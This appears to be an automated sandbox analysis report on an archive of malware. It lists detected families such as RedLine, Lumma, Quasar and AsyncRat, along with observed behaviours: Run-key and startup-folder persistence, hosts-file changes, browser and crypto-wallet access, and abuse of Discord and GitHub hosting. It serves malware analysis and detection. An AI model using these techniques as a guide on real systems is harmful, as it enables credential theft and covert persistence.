Analysis Overview
SHA256
cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d
Threat Level: Known bad
The file 241127-xqsswsslej_pw_infected.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm
Redline family
Quasar RAT
RedLine payload
Lumma family
Quasar payload
Xworm family
Amadey
RedLine
Asyncrat family
Merlin
Quasar family
Lumma Stealer, LummaC
AsyncRat
Amadey family
Merlin payload
Detect Xworm Payload
Merlin family
Async RAT payload
Downloads MZ/PE file
Blocklisted process makes network request
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Checks BIOS information in registry
Loads dropped DLL
Clipboard Data
Unsecured Credentials: Credentials In Files
Drops startup file
Reads user/profile data of web browsers
Executes dropped EXE
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Obfuscated Files or Information: Command Obfuscation
Enumerates connected drives
Looks up external IP address via web service
Checks installed software on the system
Drops file in System32 directory
Enumerates processes with tasklist
Suspicious use of SetThreadContext
Sets desktop wallpaper using registry
UPX packed file
Drops file in Windows directory
Drops file in Program Files directory
Detects Pyinstaller
Embeds OpenSSL
Event Triggered Execution: Netsh Helper DLL
Command and Scripting Interpreter: JavaScript
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Wi-Fi Discovery
Enumerates physical storage devices
Browser Information Discovery
System Network Configuration Discovery: Internet Connection Discovery
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Modifies Internet Explorer settings
System policy modification
Modifies registry key
Gathers system information
Detects videocard installed
Delays execution with timeout.exe
Uses Task Scheduler COM API
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Modifies Control Panel
Suspicious use of SetWindowsHookEx
Scheduled Task/Job: Scheduled Task
Modifies registry class
Suspicious use of WriteProcessMemory
Kills process with taskkill
Enumerates system info in registry
Suspicious use of SendNotifyMessage
Views/modifies file attributes
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-12-14 20:13
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-14 20:13
Reported
2024-12-14 20:22
Platform
win11-20241007-es
Max time kernel
264s
Max time network
554s
Command Line
Signatures
Amadey
Amadey family
AsyncRat
Asyncrat family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lumma Stealer, LummaC
Lumma family
Merlin
Merlin family
Merlin payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4020 created 3260 | N/A | C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com | C:\Windows\Explorer.EXE |
| PID 4020 created 3260 | N/A | C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com | C:\Windows\Explorer.EXE |
Xworm
Xworm family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\new.lnk | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\new.lnk | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\BingWallpaperApp = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\BingWallpaperApp.exe" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\new = "C:\\Users\\Admin\\AppData\\Roaming\\new.exe" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe" | C:\Windows\system32\audiodg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI = "C:\\Users\\Admin\\Videos\\ElectronArts\\Bin\\ElectronArtsCLI.exe" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\07968106F50A1448456937\\07968106F50A1448456937.exe" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\WPImages\\20241214.jpg" | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\sas.dll | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\SeetrolMyService.exe | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\Seetrol_Clt.exe | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\sthooks.dll | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe | N/A |
| File created | C:\Program Files (x86)\seetrol\client\SeetrolClient.exe | C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF793DC10DA9572D25.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFB6B.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{240D9941-B463-4B9C-B483-7129740B9AC1} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFB6B.tmp-\DispatchQueue.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFDFB63DB7F55637BF.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\InternshipWant | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe | N/A |
| File opened for modification | C:\Windows\GovernmentalPoetry | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5af28f.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF7A1.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFB6B.tmp-\CustomActions.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\MoBelongs | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF406.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF7A1.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF7A1.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFB6B.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\JpegSuse | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFE6D59846241A2593.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | C:\Windows\Installer\e5af28f.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFB6B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF4EF8ECC2C6C84C85.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5af293.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF7A1.tmp-\CustomActions.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF7A1.tmp-\DispatchQueue.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
